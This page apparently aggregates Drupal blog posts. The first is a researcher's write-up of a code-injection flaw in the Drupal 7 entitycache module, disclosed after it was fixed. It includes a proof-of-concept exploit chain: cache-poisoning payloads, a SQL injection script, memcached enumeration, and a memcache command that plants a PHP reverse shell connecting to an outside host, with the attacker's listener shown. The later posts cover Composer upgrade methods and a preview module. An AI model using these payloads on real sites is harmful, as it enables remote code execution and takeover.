Upgrade Your Drupal Skills

We trained 1,000+ Drupal Developers over the last decade.

See Advanced Courses NAH, I know Enough
Nov 27 2023
Nov 27

PHP's create_function() was:

DEPRECATED as of PHP 7.2.0, and REMOVED as of PHP 8.0.0

As the docs say, its use is highly discouraged.

PHP 7 is no longer supported by the upstream developers, but it'll still be around for a while longer (because, for example, popular linux distributions provide support for years beyond the upstream End of Life).

Several years ago I stumbled across a usage of create_function in the entitycache module which was open to abuse in quite an interesting way.

The route to exploitation requires there to be a security problem already, so the Drupal Security Team agreed there was no need to issue a Security Advisory.

The module has removed the problematic code so this should not be a problem any more for sites that are staying up-to-date.

This is quite a fun vulnerability though, so let's look at how it might be exploited given the right (or should that be "wrong"?) conditions.

To be clear, we're talking about Drupal 7 and (probably) drush 8. The latest releases of both are now into double digits.

Is it unsafe input?

Interestingly, the issue is in a drush specific inc file:

/**
 * Implements hook_drush_cache_clear().
 */
function entitycache_drush_cache_clear(&$types) {
  $entities = entity_get_info();
  foreach ($entities as $type => $info) {
    if (isset($info['entity cache']) && $info['entity cache']) {
      // You can't pass paramters to the callbacks in $types, so create an
      // anonymous function for each specific bin.
      $lamdba = create_function('', "return cache_clear_all('*', 'cache_entity_" . $type . "', TRUE);");
      $types['entitycache-' . str_replace('_', '-', $type)] = $lamdba;
    }
  }
}

https://git.drupalcode.org/project/entitycache/-/blob/7.x-1.5/entitycach...

Let's remind ourselves of the problem with create_function(); essentially it works in a very similar way to calling eval() on the second $code parameter.

So - as is often the case - it's very risky to pass unsafe user input to it.

In this case, we might not even consider the $type variable to be user input; it comes from the array keys returned by entity_get_info().

Is there really a problem here? Well only if an attacker were able to inject something into those array keys. How might that happen?

entity_cache_info() uses a cache to minimise calls to implementations of hook_entity_info.

If an attacker is able to inject something malicious into that cache, there could be a path to Remote Code Execution here.

Let's just reiterate that this is a big "IF"; an attacker having the ability to inject things into cache is obviously already a pretty significant problem in the first place.

How might that come about? Perhaps the most obvious case would be a SQL Injection (SQLi) vulnerability. Assuming a site keeps its default cache bin in the database, a SQLi vulnerability might allow an attacker to inject their payload. We can look more closely at how that might work, but note that the entitycache project page says:

Don't bother using this module if you're not also going to use http://drupal.org/project/memcache or http://drupal.org/project/redis - the purpose of entitycache is to allow queries to be offloaded from the database onto alternative storage. There are minimal, if any, gains from using it with the default database cache.

So perhaps it's not that likely that a site using entitycache would have its cache bins in the database.

We'll also look at how an attacker might use memcache as an attack vector.

Proof of Concept

To keep things simple initially, we'll look at conducting the attack via SQL.

Regardless of what technology the victim site is using for caching, the attack needs to achieve a few objectives.

As we consider those, keep in mind that the vulnerable code is within an implementation of hook_drush_cache_clear, so it will only run if and when caches are cleared via drush.

Objectives

  • The malicious payload has to be injected into the array keys of the cached data returned by entity_cache_info().
  • The injection cannot break Drupal so badly that drush cannot run a cache clear.
  • However, the attacker may wish to deliberately break the site sufficiently that somebody will attempt to remedy the problem by clearing caches (insert "keep calm and clear cache" meme here!).

The relevant cache item here is:

$cache = cache_get("entity_info:$langcode")

https://git.drupalcode.org/project/drupal/-/blob/7.98/includes/common.in...

The simplest possible form of attack might be to try to inject a very simple array into that cache item, with the payload in an array key. For example:

array('malicious payload' => 'foo');

Let's look at what we'd need to do to inject this array into the site's cache so that this is what entity_cache_info() will return.

The simplest way to do this is to use a test Drupal 7 site and the cache API. Note that we're highly likely to break the D7 site along the way.

We can use drush to run some simple code that stores our array into the cache:

$ drush php
 
>>> $entity_info = array('malicious payload' => 'foo');
=> [
     "malicious payload" => "foo",
   ]
 
>>> cache_set('entity_info:en', $entity_info);

Now let's look at the cache item in the db:

$ drush sqlc
 
> SELECT * FROM cache WHERE cid = 'entity_info:en';
+----------------+-------------------------------------------+--------+------------+------------+
| cid            | data                                      | expire | created    | serialized |
+----------------+-------------------------------------------+--------+------------+------------+
| entity_info:en | a:1:{s:17:"malicious payload";s:3:"foo";} |      0 | 1696593295 |          1 |
+----------------+-------------------------------------------+--------+------------+------------+

Okay, that's pretty simple; we can see that the array was serialized. (Of course the fact that the cache API will unserialize this data may lead to other attack vectors if there's a suitable gadget chain available, but we'll ignore that for now.)

How is the site doing now? Let's try a drush status:

$ drush st
 
Error: Class name must be a valid object or a string in entity_get_controller() (line 8216 of /var/www/html/includes/common.inc).
 
Drush was not able to start (bootstrap) Drupal.  
Hint: This error can only occur once the database connection has already been successfully initiated, therefore this error generally points to a site configuration issue, and not a problem connecting to the database.

That's not so great, and importantly we get the same error when try to clear caches by running drush cc all.

We've broken the site so badly that drush cannot bootstrap Drupal sufficiently to run a cache clear, so we've failed to meet the objectives.

The site can be restored by manually removing the injected cache item, but this means the attack was unsuccessful.

It seems we need to be a bit more surgical when injecting the payload into this cache item, as Drupal's bootstrap relies on being able to load some valid information from it.

We could just take the valid default value for this cache item and inject the malicious payload on top of that, but it's quite a lot of serialized data (over 13kb on a vanilla D7 install) and is therefore quite cumbersome to manipulate.

Through a process of trial and error, using Xdebug to step through the code, we can derive some minimal valid data that needs to be present in the cache item for drush to be able to bootstrap Drupal far enough to run a cache clear.

It's mostly the user entity that needs to be somewhat intact, but there's also a dependency on the file entity that requires a vaguely valid array structure to be in place.

Here's an example of a minimal array that we can use for the injection that allows a sufficiently full bootstrap:

$entity_info['user'] = [                                                           
  'controller class' => 'EntityCacheUserController',                               
  'base table' => 'users',                                                         
  'entity keys' => ['id' => 'uid'],                                                
  'schema_fields_sql' => ['base table' => ['uid']],                                
  'entity cache' => TRUE,                                                          
];                                                                                 
 
$entity_info = [                                                                   
  'user' => $entity_info['user'],                                                  
  'file' => $entity_info['user'],                                                  
  'malicious payload' => $entity_info['user']
];

Note that it seems only the user entity really needs the correct entity controller and db information, so we can reuse some of the skeleton data. It may be possible to trim this back further.

Let's try injecting that into the cache via drush php and then checking whether drush is still functional.

It's convenient to put the injection code into a script so we can iterate on it easily - the $entity_info array is the same as the code snippet above.

$ cat cache_injection.php
 'EntityCacheUserController',
  'base table' => 'users',
  'entity keys' => ['id' => 'uid'],
  'schema_fields_sql' => ['base table' => ['uid']],
  'entity cache' => TRUE,
];
 
$entity_info = [
  'user' => $entity_info['user'],
  'file' => $entity_info['user'],
  'malicious payload' => $entity_info['user']
];
 
cache_set('entity_info:en', $entity_info);
 
$ drush scr cache_injection.php
 
$ drush st
 Drupal version                  :  7.99-dev
 
...snip - no errors...
 
$ drush ev 'print_r(array_keys(entity_get_info()));'
Array
(
    [0] => user
    [1] => file
    [2] => malicious payload
)

We can successfully run drush cc all with this in place, but all that this achieves is blowing away our injected payload and replacing it with clean values generated by hook_entity_info.

$ drush cc all
'all' cache was cleared.
 
$ drush ev 'print_r(array_keys(entity_get_info()));'
Array
(
    [0] => comment
    [1] => node
    [2] => file
    [3] => taxonomy_term
    [4] => taxonomy_vocabulary
    [5] => user
)

We're making progress though.

Let's try putting an actual payload into the array key in our script:

$ tail -n7 cache_injection.php 
 
$entity_info = [
  'user' => $entity_info['user'],
  'file' => $entity_info['user'],
  'foo\', TRUE);} echo "code execution successful"; //' => $entity_info['user']                                      
]; 
 
cache_set('entity_info:en', $entity_info);
 
$ drush scr cache_injection.php
 
$ drush ev 'print_r(array_keys(entity_get_info()));'
Array
(
    [0] => user
    [1] => file
    [2] => foo', TRUE);} echo "code execution successful"; //
)
 
$ drush cc all
code execution successfulcode execution successful'all' cache was cleared.

Great, so it's not very pretty but we've achieved code execution when the cache was cleared via drush.

A real attacker would no doubt want to do a bit more than just printing messages. As is often the case, escaping certain characters can be a bit tricky but you can squeeze quite a useful payload into the array key.

Having said we've achieved code execution, so far we got there by running PHP code through drush. If an attacker could do this, they don't really need to mess around with injecting payloads into the caches.

Let's work backwards now and see how this attack might work with more limited access whereby injecting data into the cache is all we can do.

Attack via SQLi

If we re-run the injection script but don't clear caches, we can look in the db to see what ended up in cache.

$ drush sqlq 'SELECT data FROM cache WHERE cid = "entity_info:en";'
 
a:3:{s:4:"user";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}s:4:"file";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}s:50:"foo', TRUE);} echo "code execution successful"; //";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}}

This is not very pretty to look at, but we can see our array has been serialized.

If we have a SQLi vulnerability to play with, it's not hard to inject this payload straight into the db.

To simulate using a payload in a SQLi attack we could store the data in a file then send it to the db in a query. We'll empty out the cache table first to prove that it's our injected payload achieving execution.

After wiping the cache manually like this, we'll call drush status to repopulate the cache with valid entries. This means we can use an UPDATE statement (as opposed to doing an INSERT if the caches are initially empty), which is a more realistic simulation of attacking a production site.

Note also that we have to ensure that any quotes in our payload are escaped appropriately, and that we don't have any newlines in the middle of our SQL statement.

I often think fiddly things like this are the hardest part of developing these PoC exploits!

# inject the payload using a drush script
$ drush scr cache_injection.php
 
# extract the payload into a SQL statement stored in a file
$ echo -n "UPDATE cache SET data = '" > sqli.txt
$ drush sqlq 'SELECT data FROM cache WHERE cid = "entity_info:en";' | sed "s#'#\\\\'#g" | tr -d "\n" >> sqli.txt
$ echo "' WHERE cid = 'entity_info:en';" >> sqli.txt
 
# empty the cache table, and repopulate it with valid entries
$ drush sqlq 'DELETE FROM cache;'
$ drush st
 
# inject the payload, simulating SQLi
$ cat sqli.txt | drush sqlc
 
# execute the attack
$ drush cc all
code execution successful ...

So we've now developed a single SQL statement that could be run via SQLi which will result in RCE when drush cc all is run on the victim site.

In an actual attack, the payload would be prepared on a separate test site and the injection would only happen via SQLi on the victim site.

However, as mentioned previously it's perhaps unlikely that a site using the entitycache module would be keeping its caches in the database.

Attack via memcache

How about if the caches are in memcache; what might an attack look like then?

First we're going to assume that the attacker has network access to the memcached daemon. Hopefully this is quite unlikely in real life, but it's not impossible.

The objective of the attack will be exactly the same in that we want to inject a malicious payload into the array keys of the data cached for entity info.

The mechanics of how we might do so are a little different with a "memcache injection" though.

The Drupal memcache module (optionally) uses a key prefix to "namespace" cache items for a given site, which allows multiple applications to share the same memcached instance (and such a shared instance is one scenario in which this attack might take place).

In order to be able to inject a payload into a specific cache item, the attacker would need to find out what prefix is in use for the target site.

Here's an example of issuing a couple of commands over the network to a memcached instance in order to find out what the cache keys look like:

$ echo "stats slabs" | nc memcached 11211 | head -n2
STAT 2:chunk_size 120
STAT 2:chunks_per_page 8738
 
$ echo "stats cachedump 2 2" | nc memcached 11211 | head -n2
ITEM dd_d7-cache-.wildcard-node_types%3A [1 b; 0 s]
ITEM dd_d7-cache-.wildcard-entity_info%3A [1 b; 0 s]

This shows us that there's a Drupal site using a key prefix of dd_d7. A large site may be using multiple memcached slabs and this enumeration step may be a bit more complex.

So in this case the cache item we're looking to attack will have the key dd_d7-cache-entity_info%3Aen.

We can go through a very similar exercise to what we did with the SQL caches; using a test site to inject the minimal data structure we want into the cache, then extracting it to see exactly what it looks like when stored in a memcache key/value pair.

There are a couple of small complications we're likely to encounter with this workflow.

One of those is that Drupal typically uses compression by default in memcache. This is generally a good thing, but makes it harder to extract the payload we want to inject in plain text that's easy to manipulate.

If you've ever output a zip file or compressed web page in your terminal and ended up with a screen full of gobbledygook, that's the sort of thing that'll happen if you try to retrieve a compressed item directly from memcached.

We can get around this by disabling compression on our test site.

Another potential problem is that the memcache integration works a bit differently to database cache when it comes to expiry of items. By default, memcache won't return items once their expiry timestamp has passed, whereas the database cache will return stale items (for a while at least).

This means that if an attacker prepares a payload for memcache but leaves the expiry timestamp in tact, it's possible that the item will already be expired by the time the payload is injected into the target site, and the attack will not work.

It's not too hard to get around this by setting a fake timestamp that should avoid expiry. Note that there are at least two different types of expiry at play here; memcache itself has an expiry time, and Drupal's cache API has its own on top of this.

There's also the concept of cache flushes in Drupal memcache. It's out of scope to go into too much detail about that here, but the tl;dr is that the memcache module keeps track of when caches are flushed and tries not to return items that were stored before any such flush. An attack has more chance of succeeding if it also tries to ensure that the injected cache item doesn't fall foul of this as it'd then be treated as outdated and not returned.

Injecting an item into memcache will typically mean using the SET command.

The syntax for this command includes a flags parameter which is "opaque to the server" but is used by the PHP memcached extension to determine whether a cache item is compressed. This means that even if a site is using compression by default, an attacker can inject an uncompressed item and the application will not know the difference; the PHP integration handles the compression (or lack thereof).

Part of the syntax also tells the server how many bytes of data are about to be transmitted following the initial SET instruction. This means that if we manipulate the data we want to store in memcache, we have to ensure that the byte count remains correct.

We also need to ensure that the PHP serialized data remains consistent; for example if we change an IP address we need to ensure that the string it's within still has the correct length e.g. s:80:\"foo' ...

Putting all of that together, and jumping through some more hoops to ensure that quotes are appropriately escaped, we might end up with something like the below:

$ echo -e -n "set dd_d7-cache-entity_info%3Aen 4 0 978\r\nO:8:\"stdClass\":6:{s:3:\"cid\";s:14:\"entity_info:en\";s:4:\"data\";a:3:{s:4:\"user\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}s:4:\"file\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}s:80:\"foo', TRUE);}\$s=fsockopen(\"172.19.0.1\",1337);\$p=proc_open(\"sh\",[\$s,\$s,\$s],\$i);//\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}}s:7:\"created\";i:TIMESTAMP;s:17:\"created_microtime\";d:TIMESTAMP.2850001;s:6:\"expire\";i:0;s:7:\"flushes\";i:999;}\r\n" | sed "s/TIMESTAMP/9999999999/g" | nc memcached 11211

This should successfully inject a PHP reverse shell into the array keys, which gets executed when drush cc all is run and the vulnerable code passes each array key to create_function().

$ ./poison_entity_info.sh  # this script contains the memcache set command above
STORED
 
$ drush ev 'print_r(array_keys(entity_get_info()));'
  Array
  (
      [0] => user
      [1] => file
      [2] => foo', TRUE);}$s=fsockopen("172.19.0.1",1337);$p=proc_open("sh",[$s,$s,$s],$i);//
  )
 
$ drush cc all
'all' cache was cleared.

Meanwhile in the attacker's terminal...

$ nc -nvlp 1337
Listening on 0.0.0.0 1337
 
Connection received on 172.19.0.3 58220
 
python -c 'import pty; pty.spawn("/bin/bash")'
 
mcdruid @ drupal-7:/var/www/html$ head -n2 CHANGELOG.txt
Drupal 7.xx, xxxx-xx-xx (development version)
-----------------------

We successfully popped an interactive reverse shell from the victim system when the drush cache clear command was run.

One final step in this attack might be to deliberately break the site just enough that the administrator will manually clear the caches to try to rectify the problem, but not so badly that clearing the caches with drush will not work.

Perhaps the injection into the entity_info cache item already achieves that goal?

Could this attack also be carried out via Redis? Probably.

I'm sharing the details of this attack scenario because I think it's an interesting one, and because well maintained sites should not be affected. In order to be exploitable the victim site has to be running an outdated version of the entitycache module, on PHP<8, and most importantly has to be vulnerable (or at least exposed) in quite a serious way; if an attacker can inject arbitrary data into a site's caches, they can do all sorts of bad things.

As always, the best advice for anyone concerned about their site(s) being vulnerable is to keep everything up-to-date; the latest releases of the entitycache module no longer call create_function().

Thanks to Greg Knaddison (greggles) for reviewing this post.

Nov 27 2023
Nov 27
Allan ChappellAllan Chappell

Allan Chappell

Senior Support Lead

Allan brings technological know-how and grounds it with some simple country living. His interests include DevOps, animal husbandry (raising rabbits and chickens), hiking, and automated testing.

November 27, 2023

At the time of this blog, we have done two major version upgrades of Drupal and have refined the process along the way. There has been a lot of work in the community, through the efforts of people like Matt Glaman to make this process easier.

As a Support Engineer, I see a lot of approaches for achieving the same results in many areas of my work. Here, I’d like to share with you three different ways to achieve an upgrade of a module or theme that isn’t ready for the next major Drupal version, each with pros and cons, but all absolutely acceptable.

Why do we have this problem?

All new Drupal developers have a hard time with the layers of code changes that happen in the Drupal community. We have custom package types, custom install locations, patches, and scaffolding. To make the challenges worse, we have two ways to identify a module’s dependencies — that being a .info.yml file and for some, a composer.json. This is because some Drupal modules may want to build upon an existing PHP library or project, in addition to other Drupal modules. To ease the pain of having to define some dependencies twice, both in the .info.yml file and composer.json file, Drupal.org built their packagist, a repository of Composer packages, to read the .info.yml files from the root of the project and create Composer version constraints from that. For example, if the .info file contained the following:

name: My Module
type: module
core_version_requirement: ^8.8 || ^9
dependencies:
  - ctools:ctools

Then Drupal.org’s packagist would create the following for the release that contained that .info.yml file, saving the contributed developer a lot of trouble.

{
    "type": "drupal-module",
    "name": "drupal/my_module",
    "require": {
      "drupal/core": "^8.8 || ^9",
      "drupal/ctools": "*"
    }
  }

I hit on something there, though. It will create that for the release the .info.yml was in. When most code changes come in the form of patches, this poses a challenge. You apply your patch to the .info.yml after you download the release from Drupal.org’s packagist. Additionally, Drupal.org doesn’t create a new release entry for every patch file in the issue queue. So you are left with the question, “How do I install a module on Drupal 10 that requires Drupal 9 so that I can patch it to make it compatible for Drupal 10?”

Drupal Lenient

One of the easiest methods for those who don’t understand the ins and outs of Composer is to use the Drupal Lenient plugin. It takes a lot of the manual work out of defining new packages and works with any drupal-* typed library. Types are introduced to us through the use of the Composer Installer plugin and manipulated further with something like Composer Installers Extender. Composer plugins can be quite powerful, but they ultimately add a layer of complexity to any project over using core composer tactics.

Drupal Lenient works by taking any defined package pulled in by any means via Composer, and replaces the version constraints for drupal/core currently, at the time of this writing, with “^8 || ^9 || ^10“. So where the requirements might look like the example earlier “drupal/core“: “^8.8 || ^9“, they are replaced, making it now possible to install alongside Drupal 10, even though it might not‌ be compatible yet. This allows you to patch, test, or use the module as is, much like if you would have downloaded the zip and thrown it into your custom modules directory.

An example may look like this:

{
  "name": "vendor/project",
  "repositories": [
    {
      "type": "composer",
      "url": "https://packages.drupal.org/8"
    }
  ],
  "require": {
    "drupal/core": "^10.0.0",
    "drupal/my_module": "1.x-dev",
    "cweagans/composer-patches": "^1.7.3",
    "mglaman/composer-drupal-lenient": "^1.0.3"
  }"
  extra": {
    "composer-exit-on-patch-failure": true,
    "drupal-lenient": {
      "allowed-list": [
        "drupal/my_module"
      ]
    },
    "patches": {
      "drupal/my_module": {
        "3289029: Automated Drupal 10 compatibility fixes": "https://www.drupal.org/files/issues/2022-06-16/my_module.1.x-dev.rector.patch"
      }
    },
    "patchLevel": {
      "drupal/core": "-p2"
    },
  }
}

Note the Drupal-Lenient allow list. Also note that you will need to make sure and install the plugin before trying to install the module that doesn’t support Drupal 10 in this case. If you want an excellent step-by-step, Matt put one together in the Readme.

The pros:

  • Easy-peasy to install
  • Feeds off the original packagist packages, so if there is an upgrade, you don’t have to do anything special to transition

The cons:

  • Lenient has the control and may cause inexplicable errors when updating due to unsupported core versions
  • PHP devs not familiar with Drupal Lenient won’t know to look for it
  • Flaky experiences when switching in and out of branches that include this plugin. If you context switch a lot, be prepared to handle some errors due to Composer’s challenges maintaining state between branches.
  • Patches to other dependencies inside composer.json still require you to run through some hoops

Custom package

If you want more control over what the module can and cannot do, while keeping the core of Composer functionality without adding yet another plugin, check out this method. What we will do here is find out what version the patch or merge request is being applied against. It should be stated in the issue queue and by best practices is a dev version.

If you are a perfectionist, you can use composer install -vvv to find the url or cache file that the module came from for packages.drupal.org. It is usually one of https://packages.drupal.org/files/packages/8/p2/drupal/my_module.json or https://packages.drupal.org/files/packages/8/p2/drupal/my_module~dev.json. You will note that the Composer cache system follows a very similar structure, swapping out certain characters with dashes.

With this information, you can grab the exact package as it’s defined in the Drupal packagist. Find the version you want, and then get it into your project’s composer.json.

Let’s use Context Active Trail as an example, because at the time of this writing, there is no Drupal 10 release available.

Drupal release information

Looking through the issue queue, we see Automated Drupal 10 compatibility fixes, which has a patch on it at. I grab the Composer package info and paste the 2.0-dev info into my composer.json under the “repositories” section as a type “package.”

Drupal packagesDrupal packages

Which should make your project look something like this:

{
  "name": "vendor/project",
  "repositories": [
    {
      "type": "package",
      "package": {
        "keywords": [
          "Drupal",
          "Context",
          "Active trail",
          "Breadcrumbs"
        ],
        "homepage": "https://www.drupal.org/project/context_active_trail",
        "version": "dev-2.x",
        "version_normalized": "dev-2.x",
        "license": "GPL-2.0+",
        "authors": [
          {
            "name": "Jigar Mehta (jigarius)",
            "homepage": "https://jigarius.com/",
            "role": "Maintainer"
          },
          {
            "name": "jigarius",
            "homepage": "https://www.drupal.org/user/2492730"
          },
          {
            "name": "vasi",
            "homepage": "https://www.drupal.org/user/390545"
          }
        ],
        "support": {
          "source": "https://git.drupalcode.org/project/context_active_trail",
          "issues": "https://www.drupal.org/project/issues/context_active_trail"
        },
        "source": {
          "type": "git",
          "url": "https://git.drupalcode.org/project/context_active_trail.git",
          "reference": "8dc46a4cf28e0569b187e88627a30161ee93384e"
        },
        "type": "drupal-module",
        "uid": "context_active_trail-3192784",
        "name": "drupal/context_active_trail",
        "extra": {
          "branch-alias": {
            "dev-2.x": "2.x-dev"
          },
          "drupal": {
            "version": "8.x-2.0-rc2+1-dev",
            "datestamp": "1630867980",
            "security-coverage": {
              "status": "not-covered",
              "message": "Project has not opted into security advisory coverage!"
            }
          }
        },
        "description": "Set the active trail based on context.",
        "require": {
          "drupal/context": "^4.1",
          "drupal/core": "^8.8 || ^9"
        }
      }
    },
    {
      "type": "composer",
      "url": "https://packages.drupal.org/8"
    }
  ],
  "require": {
    "drupal/core": "^10.0.0",
    "drupal/context_active_trail": "2.x-dev",
    "cweagans/composer-patches": "^1.7.3",
    "mglaman/composer-drupal-lenient": "^1.0.3"
  }"
  extra": {
    "composer-exit-on-patch-failure": true,
    },
    "patches": {
    },
    "patchLevel": {
      "drupal/core": "-p2"
    },
  }
}

Now let’s change our version criteria:

…
        "description": "Set the active trail based on context.",
        "require": {
          "drupal/context": "^4.1",
          "drupal/core": "^8.8 || ^9 || ^10"
        }
…

And then add our patch:

…
  extra": {
    "composer-exit-on-patch-failure": true,
    },
    "patches": {
      "drupal/context_active_trail": {
        "Automated Drupal 10 compatibility fixes": "https://www.drupal.org/files/issues/2023-09-29/context_d10comp_3286756.patch"
      }
    },
    "patchLevel": {
      "drupal/core": "-p2"
    },
  }
…

Here, you will need to look to see if the patch is patching composer.json. If it is, you will need to modify your package information accordingly. For example, in this one, the fixer changes drupal/context from ^4.1 to ^5.0.0-rc1. That change looks like this:

…
        "description": "Set the active trail based on context.",
        "require": {
          "drupal/context": "^5.0.0-rc1",
          "drupal/core": "^8.8 || ^9 || ^10"
        }
…

Lastly, sometimes you run into some complications with the order packages are picked up by Composer. You may need to add an exclude element to the Drupal packagist.

…
  {
      "type": "composer",
      "url": "https://packages.drupal.org/8",
      "exclude": [
          "drupal/context_active_trail"
      ]
  },
…

Our final composer.json for our project could look something like this with all the edits:

{
  "name": "vendor/project",
  "repositories": [
    {
      "type": "package",
      "package": {
        "keywords": [
          "Drupal",
          "Context",
          "Active trail",
          "Breadcrumbs"
        ],
        "homepage": "https://www.drupal.org/project/context_active_trail",
        "version": "dev-2.x",
        "version_normalized": "dev-2.x",
        "license": "GPL-2.0+",
        "authors": [
          {
            "name": "Jigar Mehta (jigarius)",
            "homepage": "https://jigarius.com/",
            "role": "Maintainer"
          },
          {
            "name": "jigarius",
            "homepage": "https://www.drupal.org/user/2492730"
          },
          {
            "name": "vasi",
            "homepage": "https://www.drupal.org/user/390545"
          }
        ],
        "support": {
          "source": "https://git.drupalcode.org/project/context_active_trail",
          "issues": "https://www.drupal.org/project/issues/context_active_trail"
        },
        "source": {
          "type": "git",
          "url": "https://git.drupalcode.org/project/context_active_trail.git",
          "reference": "8dc46a4cf28e0569b187e88627a30161ee93384e"
        },
        "type": "drupal-module",
        "uid": "context_active_trail-3192784",
        "name": "drupal/context_active_trail",
        "extra": {
          "branch-alias": {
            "dev-2.x": "2.x-dev"
          },
          "drupal": {
            "version": "8.x-2.0-rc2+1-dev",
            "datestamp": "1630867980",
            "security-coverage": {
              "status": "not-covered",
              "message": "Project has not opted into security advisory coverage!"
            }
          }
        },
        "description": "Set the active trail based on context.",
        "require": {
          "drupal/context": "^5.0.0-rc1",
          "drupal/core": "^8.8 || ^9 || ^10"
        }
      }
    },
    {
      "type": "composer",
      "url": "https://packages.drupal.org/8",
      "exclude": [
          "drupal/context_active_trail"
      ]
    }
  ],
  "require": {
    "drupal/core": "^10.0.0",
    "drupal/context_active_trail": "2.x-dev",
    "cweagans/composer-patches": "^1.7.3",
    "mglaman/composer-drupal-lenient": "^1.0.3"
  }"
  extra": {
    "composer-exit-on-patch-failure": true,
    },
    "patches": {
      "drupal/context_active_trail": {
        "Automated Drupal 10 compatibility fixes": "https://www.drupal.org/files/issues/2023-09-29/context_d10comp_3286756.patch"
      }
    },
    "patchLevel": {
      "drupal/core": "-p2"
    },
  }
}

The pros:

  • Uses more core Composer functionality
  • A PHP developer will better understand ‌what’s going on here
  • You are in complete control of how this module package and version are defined
  • All the work is in one file

The cons:

  • Requires some understanding of how composer.json, packagists, and the magic of Drupal’s packagist all work
  • That’s a messy composer.json for the project
  • If you have to use exclude, you have to leave it up to outside forces to let you know when that module does finally put out and actual D10-ready version, and then undo all of this work

Standard PHP composer best practice says that if you make modifications to a package, fork it, maintain your modifications, and provide a pull request if it’s functionality you wish to contribute back. You can use this same approach with Drupal modules as well. Some may even say that’s what issue forks are for! That said, issue forks come with the downside that sometimes they go away, or are overridden with changes you don’t want. They are a moving dot.

For the sake of this example, let’s assume that we have forked the module on GitHub to https://github.com/fourkitchens/context_active_trail.git. If you don’t know how to make a fork, simply do the following:

  • Clone the module to your local computer using the git instructions for the module in question
  • Check out the branch you want to base your changes on
  • Create a new repository on GitHub
  • Add it as a remote git remote add github [email protected]:fourkitchens/context_active_trail.git
  • Push it! git push github 8.x-2.x

You can do this with a version of the module that is in a merge request in Drupal.org’s issue queue, too. That way you won’t have to reapply all the changes. However, if your changes are in a patch file, consider adding them to the module at this time using your favorite patching method. Push all your changes to the github remote.

If the patch files don’t have changes to composer.json, or if the module doesn’t have one, you will likely want to provide at least a bare-bones one that contains something like the following and commit it:

{
  "name": "drupal/context_active_trail",
  "type": "drupal-module",
  "require": {
    "drupal/context": "^5.0.0-rc1",
    "drupal/core": "^8.8 || ^9 || ^10"
  }
}

This will tell Composer what it needs to know inside the project about dependencies. This project already had a composer.json, so I needed to add the changes from the patch to it.

Inside our Drupal project we are working on, we need to add a new entry to the repositories section. It will look something like this:

    {
      "type": "vcs",
      "url": "https://github.com/fourkitchens/context_active_trail.git"
    },

The VCS type repository entry tells Composer to look at the repository and poll for all its branches and tags. These will be your new version numbers.

Much like in the “Custom Package” example, you may need to add an exclude property to the Drupal packagist entry.

…
  {
      "type": "composer",
      "url": "https://packages.drupal.org/8",
      "exclude": [
          "drupal/context_active_trail"
      ]
  },
…

Now, since Drupal packagist isn’t here to give Composer some version aliases, we have to use the old notation dev-BRANCHNAME for our version. Our require entry will look something like this:

 "drupal/context_active_trail": "dev-8.x-2.x",

Since we already added our patches as a commit to the module, this is all you need. Your final composer.json for your project would look like this:

{
  "name": "vendor/project",
  "repositories": [
    {
      "type": "vcs",
      "url": "https://github.com/fourkitchens/context_active_trail.git"
    },
    {
      "type": "composer",
      "url": "https://packages.drupal.org/8",
      "exclude": [
          "drupal/context_active_trail"
      ]
    }
  ],
  "require": {
    "drupal/core": "^10.0.0",
    "drupal/context_active_trail": "dev-8.x-2.x",
  }
}

It makes for a much cleaner project json, but now you’ve split the work into two locations, requiring some synchronization. However, if multiple sites of yours use this same module and need the same fixes, this absolutely has the least resistance and ability to get those changes out more quickly.

The pros:

  • Reusability
  • Two smaller, simpler chunks of work
  • Any PHP developer should be able to debug this setup as it uses Composer best practices. This method will be used in any project with any framework in the PHP ecosystem.

The cons:

  • Changes are in two separate places
  • Which patches are applied isn’t obvious in the composer.json and require looking through the commit history on the forked repository
  • Requires maintenance and synchronization when upgrades happen

Final thoughts

As with almost everything out there, there are multiple ways to achieve the same goal. I hope this brings awareness, and helps provide the flexibility you need when upgrading Drupal to a new major version. Obviously, each solution has strengths, and you may need to mix it up to get the results you want.

Making the web a better place to teach, learn, and advocate starts here...

When you subscribe to our newsletter!

Nov 24 2023
Nov 24

As I embarked on a recent journey to enhance the usability of Drupal from the perspective of both site owners and editors, I stumbled upon what could be a game changer for content editors – the "Same Page Preview" module.

This module offers an innovative solution, providing a page preview seamlessly integrated into the editing process. Say goodbye to the hassle of toggling between the edit form and a separate preview window. With the "Same Page Preview" module, it's all about real-time content visualisation and efficiency.

cti Blog Banner

Key Features

Effortless Installation

Setting up the "Same Page Preview" module is a breeze, and it's a matter of a simple checkbox configuration against specific content types.

On-Page Canvas Preview

When adding or editing content, an on-page canvas preview elegantly unfolds. As you interact with the edit form fields, the preview updates in real time, offering an instant, dynamic view of your content.

Custom Display Options

